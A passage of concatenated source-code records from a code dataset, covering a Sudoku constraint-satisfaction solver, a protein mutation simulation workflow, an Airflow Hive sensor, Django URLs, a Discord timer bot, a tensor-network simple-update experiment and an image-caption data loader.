a list of legal value pairs for\n # the variable pair (i, j)\n self.constraints = {}\n\n def add_variable(self, name, domain):\n \"\"\"Add a new variable to the CSP. 'name' is the variable name\n and 'domain' is a list of the legal values for the variable.\n \"\"\"\n self.variables.append(name)\n self.domains[name] = list(domain)\n self.constraints[name] = {}\n\n def get_all_possible_pairs(self, a, b):\n \"\"\"Get a list of all possible pairs (as tuples) of the values in\n the lists 'a' and 'b', where the first component comes from list\n 'a' and the second component comes from list 'b'.\n \"\"\"\n return itertools.product(a, b)\n\n def get_all_arcs(self):\n \"\"\"Get a list of all arcs/constraints that have been defined in\n the CSP. 
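# ---- Editor's toy illustration (added; hypothetical variable names, not real
# solver state). With the symmetric constraint store this class builds, the
# arc list this method returns is simply every ordered pair that has an entry:
constraints = {"A": {"B": [("1", "2")]}, "B": {"A": [("2", "1")]}}
arcs = [(i, j) for i in constraints for j in constraints[i]]
assert sorted(arcs) == [("A", "B"), ("B", "A")]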
The arcs/constraints are represented as tuples (i, j),\n indicating a constraint between variable 'i' and 'j'.\n \"\"\"\n return [(i, j) for i in self.constraints for j in self.constraints[i]]\n\n def get_all_neighboring_arcs(self, var):\n \"\"\"Get a list of all arcs/constraints going to/from variable\n 'var'. The arcs/constraints are represented as in get_all_arcs().\n \"\"\"\n return [(i, var) for i in self.constraints[var]]\n\n def add_constraint_one_way(self, i, j, filter_function):\n \"\"\"Add a new constraint between variables 'i' and 'j'. The legal\n values are specified by supplying a function 'filter_function',\n that returns True for legal value pairs and False for illegal\n value pairs. This function only adds the constraint one way,\n from i -> j. You must ensure that the function also gets called\n to add the constraint the other way, j -> i, as all constraints\n are supposed to be two-way connections!\n \"\"\"\n if not j in self.constraints[i]:\n # First, get a list of all possible pairs of values between variables i and j\n self.constraints[i][j] = self.get_all_possible_pairs(self.domains[i], self.domains[j])\n\n # Next, filter this list of value pairs through the function\n # 'filter_function', so that only the legal value pairs remain\n self.constraints[i][j] = filter(lambda value_pair: filter_function(*value_pair), self.constraints[i][j])\n\n def add_all_different_constraint(self, variables):\n \"\"\"Add an Alldiff constraint between all of the variables in the\n list 'variables'.\n \"\"\"\n for (i, j) in self.get_all_possible_pairs(variables, variables):\n if i != j:\n self.add_constraint_one_way(i, j, lambda x, y: x != y)\n\n def backtracking_search(self):\n \"\"\"This functions starts the CSP solver and returns the found\n solution.\n \"\"\"\n # Make a so-called \"deep copy\" of the dictionary containing the\n # domains of the CSP variables. The deep copy is required to\n # ensure that any changes made to 'assignment' does not have any\n # side effects elsewhere.\n assignment = copy.deepcopy(self.domains)\n # Run AC-3 on all constraints in the CSP, to weed out all of the\n # values that are not arc-consistent to begin with\n self.inference(assignment, self.get_all_arcs())\n\n # Call backtrack with the partial assignment 'assignment'\n return self.backtrack(assignment)\n\n def backtrack(self, assignment):\n \"\"\"The function 'Backtrack' from the pseudocode in the\n textbook.\n\n The function is called recursively, with a partial assignment of\n values 'assignment'. 'assignment' is a dictionary that contains\n a list of all legal values for the variables that have *not* yet\n been decided, and a list of only a single value for the\n variables that *have* been decided.\n\n When all of the variables in 'assignment' have lists of length\n one, i.e. when all variables have been assigned a value, the\n function should return 'assignment'. Otherwise, the search\n should continue. When the function 'inference' is called to run\n the AC-3 algorithm, the lists of legal values in 'assignment'\n should get reduced as AC-3 discovers illegal values.\n\n IMPORTANT: For every iteration of the for-loop in the\n pseudocode, you need to make a deep copy of 'assignment' into a\n new variable before changing it. 
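# ---- Editor's demonstration (added; toy values only) of why the deep copy
# demanded above matters: plain assignment aliases the inner domain lists, so
# one branch's pruning would leak into its sibling branches.
import copy

assignment = {"x": ["1", "2"]}
alias = assignment                      # NOT a copy -- shares the inner list
alias["x"].remove("1")
assert assignment["x"] == ["2"]         # the "other branch" got mutated too

assignment = {"x": ["1", "2"]}
fresh = copy.deepcopy(assignment)       # clean slate, as the docstring requires
fresh["x"].remove("1")
assert assignment["x"] == ["1", "2"]    # original domains left intact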
Every iteration of the for-loop\n should have a clean slate and not see any traces of the old\n assignments and inferences that took place in previous\n iterations of the loop.\n \"\"\"\n global backtrack_call_num, backtrack_fail_num #global variables that keep track of the number of calls and failures\n backtrack_call_num = backtrack_call_num + 1\n\n if all(len(assignment[items]) == 1 for items in assignment):\n print('Ending reached.')\n return assignment\n \n var = self.select_unassigned_variable(assignment)\n for value in assignment[var]:\n new_assignment = copy.deepcopy(assignment)\n new_assignment[var] = value\n if self.inference(new_assignment, self.get_all_arcs()):\n solution = self.backtrack(new_assignment)\n if solution:\n return solution\n backtrack_fail_num = backtrack_fail_num + 1\n return 0\n\n def select_unassigned_variable(self, assignment):\n \"\"\"The function 'Select-Unassigned-Variable' from the pseudocode\n in the textbook. Should return the name of one of the variables\n in 'assignment' that have not yet been decided, i.e. whose list\n of legal values has a length greater than one.\n \"\"\"\n undecided_var = random.choice(list(assignment)) #just initialize this to something, any random grid area seems to work fine\n for item in assignment:\n if len(assignment[item]) > 1:\n undecided_var = item\n return undecided_var\n\n def inference(self, assignment, queue):\n \"\"\"The function 'AC-3' from the pseudocode in the textbook.\n 'assignment' is the current partial assignment, that contains\n the lists of legal values for each undecided variable. 'queue'\n is the initial queue of arcs that should be visited.\n \"\"\"\n first_values = ()\n while queue:\n first_values = queue[0]\n del queue[0]\n if(self.revise(assignment, first_values[0], first_values[1])):\n if len(assignment[first_values[0]]) == 0:\n return False\n for k in self.get_all_neighboring_arcs(first_values[0]):\n queue.append(k)\n return True\n\n def revise(self, assignment, i, j):\n \"\"\"The function 'Revise' from the pseudocode in the textbook.\n 'assignment' is the current partial assignment, that contains\n the lists of legal values for each undecided variable. 'i' and\n 'j' specifies the arc that should be visited. If a value is\n found in variable i's domain that doesn't satisfy the constraint\n between i and j, the value should be deleted from i's list of\n legal values in 'assignment'.\n \"\"\"\n revised = False\n for x in assignment[i]:\n valid_y = False\n for y in assignment[j]:\n for constraint in self.constraints[i][j]:\n #if a valid constraint exists set valid_y to True so nothing needs to be removed\n if (x, y) == constraint:\n valid_y = True\n if not valid_y:\n if x in assignment[i]:\n ## had to do this check or things exploded. 
some values were strings instead of lists so i convert them cause i dont wanna handle strings separately\n if isinstance(assignment[i], str):\n assignment[i] = [assignment[i]]\n assignment[i].remove(x)\n revised = True\n return revised\n\ndef create_sudoku_csp(filename):\n \"\"\"Instantiate a CSP representing the Sudoku board found in the text\n file named 'filename' in the current directory.\n \"\"\"\n csp = CSP()\n board = list(map(lambda x: x.strip(), open(filename, 'r')))\n\n for row in range(9):\n for col in range(9):\n if board[row][col] == '0':\n csp.add_variable('%d-%d' % (row, col), list(map(str, range(1, 10))))\n else:\n csp.add_variable('%d-%d' % (row, col), [board[row][col]])\n\n for row in range(9):\n csp.add_all_different_constraint(['%d-%d' % (row, col) for col in range(9)])\n for col in range(9):\n csp.add_all_different_constraint(['%d-%d' % (row, col) for row in range(9)])\n for box_row in range(3):\n for box_col in range(3):\n cells = []\n for row in range(box_row * 3, (box_row + 1) * 3):\n for col in range(box_col * 3, (box_col + 1) * 3):\n cells.append('%d-%d' % (row, col))\n csp.add_all_different_constraint(cells)\n\n for constraint in csp.constraints:\n for entry in csp.constraints[constraint]:\n csp.constraints[constraint][entry] = list(csp.constraints[constraint][entry])\n return csp\n\n\ndef print_sudoku_solution(solution):\n \"\"\"Convert the representation of a Sudoku solution as returned from\n the method CSP.backtracking_search(), into a human readable\n representation.\n \"\"\"\n for row in range(9):\n for col in range(9):\n print(solution['%d-%d' % (row, col)][0], end=\" \"),\n if col == 2 or col == 5:\n print('|', end=\" \"),\n print(\"\")\n if row == 2 or row == 5:\n print('------+-------+------')\n\nif __name__==\"__main__\":\n sudoku_boards = ['easy.txt', 'medium.txt', 'hard.txt', 'veryhard.txt']\n for board in sudoku_boards:\n backtrack_call_num = 0\n backtrack_fail_num = 0\n print('-----------------------')\n print('Doing', board, 'board')\n sudoku = create_sudoku_csp(board)\n result = sudoku.backtracking_search()\n print_sudoku_solution(result)\n print('Backtrack called ', backtrack_call_num, ' times.')\n print('Backtrack failed ', backtrack_fail_num, ' times.')\n print('-----------------------')\n","sub_path":"Assignment.py","file_name":"Assignment.py","file_ext":"py","file_size_in_byte":10762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609698778","text":"import sys\nimport os\nimport glob\nimport datetime\nimport numpy as np\nfrom Class_PDB import *\nfrom Class_Conf import *\nfrom Class_ONIOM_Frame import *\nfrom helper import write_data, line_feed\n\n# settings\nConfig.n_cores = 16\nConfig.max_core = 2000\nConfig.PC_cmd = 'srun'\nConfig.Amber.conf_equi['nstlim'] = 50000\nConfig.Amber.conf_prod['nstlim'] = 500000\nConfig.debug = 1\ndata_output_path = './Mutation-E-BD.dat'\nwkflow_log_path = './FAcD-Gen.py.log'\n\ndef main():\n\tstarttime = datetime.datetime.now()\n\n\tof = open(wkflow_log_path, 'wb', buffering=0)\n\tfor i in range(25):\n\t\tof.write(('Round: '+str(i)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# --- Preparation ---\n\t\tpdb_obj = PDB('./FAcD-FA-ASP.pdb', wk_dir='./FAcD_test'+str(i))\t\t# Initiate with the file from protein data bank \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.rm_wat()\n\t\tof.write(('Preparation: '+str(datetime.datetime.now()- 
starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# pdb_obj.get_protonation()\t\t\t\t\t\t\t\t\t\t\t# For most crystal files, add hydrogens\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\n\t\t# --- Operation ---\n\t\t# Mutation\n\t\tMuta_tag = pdb_obj.Add_MutaFlag('r')\t\t\t\t\t\t\t\t# Generate a target \"Flag\" for mutation \t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tif pdb_obj.MutaFlags[0][2] == '108': \t\t\t\t\t\t\t\t# Keep the key residue \n\t\t\tcontinue\n\t\tpdb_obj.PDB2PDBwLeap()\t\t\t\t\t\t\t\t\t\t\t\t# Deploy mutation \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tof.write(('Mutation: p2pwl: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# protonation modification\n\t\tpdb_obj.rm_allH()\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove all hydrogens after mutation (residues only) \t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.get_protonation()\t\t\t\t\t\t\t\t\t\t\t# Determine protonation state again \t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# use minimization to relax each mutated PDB\n\t\tpdb_obj.PDB2FF(local_lig=0)\t\t\t\t\t\t\t\t\t\t\t\t\t# Generate parameter files for MD simulation \n\t\texit_code = pdb_obj.PDBMin(engine='Amber_pmemd_gpu')\t\t\t\t# Minimization \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tif exit_code == 1:\n\t\t\tcontinue\n\t\tof.write(('Mutation: PDBMin: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\n\t\t# --- Sample with MD ---\n\t\tpdb_obj.rm_wat()\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water from the minimization \t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \t\t\t\t\t\t\t\t\t\t\t\t\n\t\tpdb_obj.PDB2FF(local_lig=0, ifsavepdb=1) \t\t\t\t\t\t\t\t\t\t# Generate parameter files *savepdb save the exact structure use in MD for future analysis \t(self.path) \n\t\tpdb_obj.PDBMD(tag=Muta_tag, engine='Amber_pmemd_gpu', equi_cpu=1)\t\t\t\t# Run MD \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.nc) \n\t\tof.write(('MD: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# sample\n\t\tpdb_obj.nc2mdcrd(point=100)\t\t\t\t\t\t\t\t\t\t\t# Sample from trajactory \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.mdcrd) \n\n\t\t# --- QM cluster ---\n\t\tatom_mask = ':108,298'\t\t\t\t\t\t\t\t\t\t\t\t# Define QM cluster / can also use some presets: ligand; residues within a distance using a Layer object\n\t\tg_route = '# hf/6-31G(d) pop=cm5 nosymm'\t\t\t\t\t\t\t# QM keywords\n\t\tpdb_obj.PDB2QMCluster(atom_mask, g_route=g_route, ifchk=1)\t\t\t# Run QM cluster calculation\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.qm_cluster_out, self.qm_cluster_chk) \n\t\tof.write(('QM Cluster: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.get_fchk(keep_chk=0)\t\t\t\t\t\t\t\t\t\t# Save fchk files for analysis\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.qm_cluster_fchk) \n\t\t\n\t\t# --- Analysis ---\n\t\t# targeting C-F bond\n\t\ta1 = int(pdb_obj.stru.ligands[0].CH3)\n\t\ta2 = int(pdb_obj.stru.ligands[0].F)\n\t\ta1qm = pdb_obj.qm_cluster_map[str(a1)]\n\t\ta2qm = pdb_obj.qm_cluster_map[str(a2)]\n\t\t# 
Field Strength (MM)\n\t\tE_atom_mask = ':1-107,109-297'\t\t\t\t\t\t\t\t\t\t# Define atoms for field strength calculation\n\t\tEs = pdb_obj.get_field_strength(E_atom_mask, a1=a1 ,a2=a2 ,bond_p1='center') # Run Field Strength analysis\n\t\tof.write(('Get field strength: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# Bond Dipole Moment (QM)\n\t\tDipoles = PDB.get_bond_dipole(pdb_obj.qm_cluster_fchk, a1qm, a2qm)\t# Run Bond Dipole Moment analysis\n\t\tof.write(('Get bond dipole: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# Mutation distance\n\t\tr1 = pdb_obj.stru.ligands[0]\n\t\tr2 = pdb_obj.stru.chains[ord(pdb_obj.MutaFlags[0][1])-65][int(pdb_obj.MutaFlags[0][2])-1]\n\t\tDist = pdb_obj.stru.get_resi_dist(r1, r2)\n\n\t\t# write to csv or plot\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twrite_data(pdb_obj.MutaFlags, {'E': Es, 'Bond Dipole': Dipoles, 'Distance': Dist}, data_output_path)\t\t# Current data: Mutation - MD geometry - QM cluster wavefunction = Field strength at bond - Bond dipole moment\n\t\tof.write((Muta_tag+ ' finish: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t\t\n\tendtime = datetime.datetime.now()\n\tprint(endtime - starttime)\n\tof.close()\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"Test_file/FAcD_expanse/FAcD-Gen-fixlog.py","file_name":"FAcD-Gen-fixlog.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379259972","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/sensors/hive_partition_sensor.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3069 bytes\nfrom airflow.sensors.base_sensor_operator import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass HivePartitionSensor(BaseSensorOperator):\n __doc__ = '\\n Waits for a partition to show up in Hive.\\n\\n Note: Because ``partition`` supports general logical operators, it\\n can be inefficient. Consider using NamedHivePartitionSensor instead if\\n you don\\'t need the full flexibility of HivePartitionSensor.\\n\\n :param table: The name of the table to wait for, supports the dot\\n notation (my_database.my_table)\\n :type table: str\\n :param partition: The partition clause to wait for. 
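# ---- Editor's illustrative sketch (added; all values hypothetical, and a real
# Airflow metastore connection is assumed for actual use). The partition
# clause documented here is plain SQL-like text, so building it is string work:
ds = "2015-01-01"                                   # stand-in for the templated {{ ds }}
sensor_kwargs = dict(
    table="my_database.my_table",                   # dot notation, per the docstring
    partition="ds='{}' AND type='value'".format(ds),
    metastore_conn_id="metastore_default",
)
assert sensor_kwargs["partition"] == "ds='2015-01-01' AND type='value'"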
This is passed as\\n is to the metastore Thrift client ``get_partitions_by_filter`` method,\\n and apparently supports SQL like notation as in ``ds=\\'2015-01-01\\'\\n AND type=\\'value\\'`` and comparison operators as in ``\"ds>=2015-01-01\"``\\n :type partition: str\\n :param metastore_conn_id: reference to the metastore thrift service\\n connection id\\n :type metastore_conn_id: str\\n '\n template_fields = ('schema', 'table', 'partition')\n ui_color = '#C5CAE9'\n\n @apply_defaults\n def __init__(self, table, partition=\"ds='{{ ds }}'\", metastore_conn_id='metastore_default', schema='default', poke_interval=180, *args, **kwargs):\n (super(HivePartitionSensor, self).__init__)(args, poke_interval=poke_interval, **kwargs)\n if not partition:\n partition = \"ds='{{ ds }}'\"\n self.metastore_conn_id = metastore_conn_id\n self.table = table\n self.partition = partition\n self.schema = schema\n\n def poke(self, context):\n if '.' in self.table:\n self.schema, self.table = self.table.split('.')\n self.log.info('Poking for table %s.%s, partition %s', self.schema, self.table, self.partition)\n if not hasattr(self, 'hook'):\n from airflow.hooks.hive_hooks import HiveMetastoreHook\n self.hook = HiveMetastoreHook(metastore_conn_id=(self.metastore_conn_id))\n return self.hook.check_for_partition(self.schema, self.table, self.partition)","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/hive_partition_sensor.cpython-36.py","file_name":"hive_partition_sensor.cpython-36.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57904807","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, include, url\n# from django.contrib import admin\n# from django.conf import settings\nfrom books.views import MainPageView\n\n\nurlpatterns = patterns('',\n url(r'^$', MainPageView.as_view(),\n name=\"index\"),\n\n url(r'^api-v1/', include('api_v1.urls',\n namespace='api_v1')),\n )\n","sub_path":"alytics_test/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230932037","text":"import discord\nfrom discord.ext import commands\nimport asyncio\n\n\nclass Ailurophile(commands.Cog, name=\"Ailurophile\"):\n def __init__(self, bot):\n self.client = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Готов быть таймером\")\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if isinstance(message.channel, discord.DMChannel) and not message.author.bot:\n text = message.content\n if text.startswith(\"set_timer in\"):\n text = text.split()[2:]\n\n if not all((text[0].isdigit(), text[1] == \"hours\", text[2] == \"and\", text[3].isdigit(), text[4] == \"minutes.\")):\n return\n\n hours, minutes = float(text[0]), float(text[3])\n if hours == int(hours):\n hours = int(hours)\n if minutes == int(minutes):\n minutes = int(minutes)\n\n seconds = 60 ** 2 * hours + 60 * minutes\n await message.channel.send(f\"The time should start in {hours} hours {minutes} minutes\")\n await asyncio.sleep(seconds)\n await message.channel.send(\"Time X has come!\")\n\n\ndef setup(bot):\n bot.add_cog(Ailurophile(bot))\n","sub_path":"discord/Timer_bot/cogs/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377237998","text":"import numpy as np\nimport 
random\nimport time\nimport matplotlib.pyplot as plt\nimport copy as cp\nimport pickle\nimport pandas as pd\n\nimport RandomPEPS as rpeps\nimport StructureMatrixGenerator as smg\nimport trivialSimpleUpdate as tsu\nimport DoubleEdgeFactorGraphs as defg\nimport SimpleUpdate as su\nimport bmpslib as bmps\n\n\n########################################################################################################################\n# #\n# TRIVIAL SIMPLE UPDATE (TSU) ON RANDOM PEPS #\n# #\n########################################################################################################################\nnp.random.seed(1)\n\n# tSU parameters\nN, M = 4, 4\nbc = 'open'\ndw = 1e-10\nD_max = 2\nt_max = 100\nepsilon = 1e-5\ndumping = 0.2\niterations = 30\nd = 2\nsmat, _ = smg.finitePEPSobcStructureMatrixGenerator(N, M)\ntensors_tsu, weights_tsu = smg.randomTensornetGenerator(smat, d, D_max)\ntensors_su, weights_su = cp.deepcopy(tensors_tsu), cp.deepcopy(weights_tsu)\nn, m = smat.shape\n\n\ndef getBMPOedgeList(N, M, smat):\n TN = np.arange(N * M).reshape(N, M)\n Hpairs = []\n Vpairs = []\n HedgeList = []\n VedgeList = []\n for i in range(N):\n for j in range(M - 1):\n tH1 = TN[i][j]\n tH2 = TN[i][j + 1]\n Hpairs.append([tH1, tH2])\n\n for i in range(N - 1):\n for j in range(M):\n tV1 = TN[i][j]\n tV2 = TN[i + 1][j]\n Vpairs.append([tV1, tV2])\n\n for i, pair in enumerate(Hpairs):\n for k in range(m):\n if smat[pair[0], k] and smat[pair[1], k]:\n HedgeList.append(k)\n break\n for i, pair in enumerate(Vpairs):\n for k in range(m):\n if smat[pair[0], k] and smat[pair[1], k]:\n VedgeList.append(k)\n break\n\n return HedgeList + VedgeList\n\n\n\n# SU parameters\nZ = np.array([[1, 0], [0, -1]])\nY = np.array([[0, -1j], [1j, 0]])\nX = np.array([[0, 1], [1, 0]])\nSz = 0.5 * Z\nSy = 0.5 * Y\nSx = 0.5 * X\nOpi = [Sx, Sy, Sz]\nOpj = [Sx, Sy, Sz]\nOp_field = np.eye(d)\ntimeStep = 0.00\ninteractionConstants = [-1] * m\ndE = 1e-5\n\nerrors_tsu = []\nerrors_su = []\n\n'''\nfor i in range(iterations):\n tensors_tsu_next, weights_tsu_next = tsu.trivialsimpleUpdate(tensors_tsu, weights_tsu, smat, D_max)\n error = np.sum(np.abs(np.asarray(weights_tsu) - np.asarray(weights_tsu_next)))\n errors_tsu.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_tsu = tensors_tsu_next\n weights_tsu = weights_tsu_next\n break\n tensors_tsu = tensors_tsu_next\n weights_tsu = weights_tsu_next\n'''\n# constructing the dual double-edge factor graph\npre_graph = defg.defg()\npre_graph = su.TNtoDEFGtransform(pre_graph, tensors_su, weights_su, smat)\ns = time.time()\npre_graph.sumProduct(t_max, epsilon, dumping, printTime=1, RDMconvergence=0)\npre_tot = time.time() - s\npre_graph.calculateFactorsBeliefs()\n\n\n\nfor i in range(iterations):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n timeStep,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n\n error = np.sum(np.abs(np.asarray(weights_su) - np.asarray(weights_su_next)))\n errors_su.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n break\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\n# constructing the dual double-edge factor graph\npost_graph = defg.defg()\npost_graph = su.TNtoDEFGtransform(post_graph, tensors_su, weights_su, smat)\ns = time.time()\npost_graph.sumProduct(t_max, epsilon, dumping, printTime=1, RDMconvergence=0)\npost_tot = time.time() - 
s\npost_graph.calculateFactorsBeliefs()\n\nrho_SU = []\n# RDMS using BP and SU\nfor i in range(n):\n rho_SU.append(su.singleSiteRDM(i, tensors_su, weights_su, smat))\nrho_pre_graph = pre_graph.calculateRDMSfromFactorBeliefs()\nrho_post_graph = pre_graph.calculateRDMSfromFactorBeliefs()\n\n\nd_pre_post = 0\nd_pre_su = 0\nd_post_su = 0\nfor i in range(n):\n d_pre_post += su.traceDistance(rho_pre_graph[i], rho_pre_graph[i])\n d_pre_su += su.traceDistance(rho_pre_graph[i], rho_SU[i])\n d_post_su += su.traceDistance(rho_post_graph[i], rho_SU[i])\n\nprint('\\nd(pre, post) = {}\\nd(pre, su) = {}\\nd(post, su) = {}'.format(d_pre_post / n, d_pre_su / n, d_post_su / n))\n\nfor _ in range(1):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n 0.1,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\nrho_next_SU = []\n# RDMS using BP and SU\nfor i in range(n):\n rho_next_SU.append(su.singleSiteRDM(i, tensors_su, weights_su, smat))\nd_post_su_next = 0\nfor i in range(n):\n d_post_su_next += su.traceDistance(rho_post_graph[i], rho_next_SU[i])\n\nprint('d(post, su-next) = {}'.format(d_post_su_next))\n\n\n\n\n\nfor i in range(iterations):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n timeStep,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n\n error = np.sum(np.abs(np.asarray(weights_su) - np.asarray(weights_su_next)))\n errors_su.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n break\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\n#plt.figure()\n#plt.plot(range(len(errors_tsu)), errors_tsu)\n#plt.plot(range(len(errors_su)), errors_su)\n#plt.legend(['tSU', 'SU'])\n#plt.show()\n\n\n# RDMS using BMPO from bmpslib\n\ntensors_su_p = su.absorbAllTensorNetWeights(tensors_su, weights_su, smat)\ntensors_su_p = smg.PEPS_OBC_broadcast_to_Itai(tensors_su_p, [N, M], d, D_max)\npeps = bmps.peps(N, M)\nfor t, T in enumerate(tensors_su_p):\n i, j = np.unravel_index(t, [N, M])\n peps.set_site(T, i, j)\nBMPO_RDMS = bmps.calculate_PEPS_2RDM(peps, int(2 * (D_max ** 2)))\nfor i in range(len(BMPO_RDMS)):\n BMPO_RDMS[i] = np.reshape(BMPO_RDMS[i], (d * d, d * d))\n","sub_path":"Runs/main_tSU_fixedPoint.py","file_name":"main_tSU_fixedPoint.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597053055","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 3 17:38:08 2020\r\n\r\n@author: dhamuk\r\n\"\"\"\r\n\r\nfrom numpy import array\r\nfrom pickle import load\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.utils import to_categorical\r\n\r\n\r\n###constants for sentence start and end\r\nSTART=' '\r\nEND=' '\r\n\r\ndef readDoc(filename):\r\n\t\r\n\tfile = open(filename, 'r')\t\r\n\tdoc = file.read()\t\r\n\tfile.close()\r\n\treturn doc\r\n \r\n\r\ndef loadDataset(filename):\r\n doc = readDoc(filename)\r\n dataset = list()\r\n \r\n for l in doc.split('\\n'): \t\r\n if len(l) < 1: #skip empty\r\n continue\r\n \t\t\r\n text=l\r\n dataset.append(text)\r\n return set(dataset)\r\n \r\n\r\ndef getDescriptions_dataset(filename, dataset):\r\n\r\n\tdocument = readDoc(filename)\r\n\tdescriptions_all = dict()\r\n\tfor line in 
document.split('\\n'):\t\r\n\t\twords = line.split()\t\t\r\n\t\timgId, img_desc = words[0], words[1:]\t\r\n\t\tif imgId in dataset:\r\n\t\t\r\n\t\t\tif imgId not in descriptions_all:\r\n\t\t\t\tdescriptions_all[imgId] = list()\r\n\t\t\r\n\t\t\tdesc = START+ ' '.join(img_desc) +END\r\n\t\t\r\n\t\t\tdescriptions_all[imgId].append(desc)\r\n\treturn descriptions_all\r\n \r\n\r\n\r\n###get all photo features for a dataset\r\ndef getFeatures_dataset(file, dataset):\t\r\n\tfeature_all = load(open(file, 'rb'))\t\r\n\tfeature = {f: feature_all[f] for f in dataset}\r\n\treturn feature\r\n \r\n####list of descriptions\r\ndef desc_list(descriptions):\r\n\tdescList = list()\r\n\tfor k in descriptions.keys():\r\n\t\t[descList.append(d) for d in descriptions[k]]\r\n\treturn descList\r\n \r\n\r\ndef fit_tokenizer(descriptions):\r\n\tdesc = desc_list(descriptions)\r\n ##User keras Tokenizer\r\n\ttokenizer = Tokenizer()\r\n\ttokenizer.fit_on_texts(desc)\r\n\treturn tokenizer\r\n \r\n####get max lenght of caption\r\ndef max_length(descriptions):\r\n\tcaptions = desc_list(descriptions) \r\n\treturn max(len(c.split()) for c in captions)\r\n \r\n\r\n\r\n# map an integer to a word\r\ndef word_for_id(integer, tokenizer):\r\n\tfor word, index in 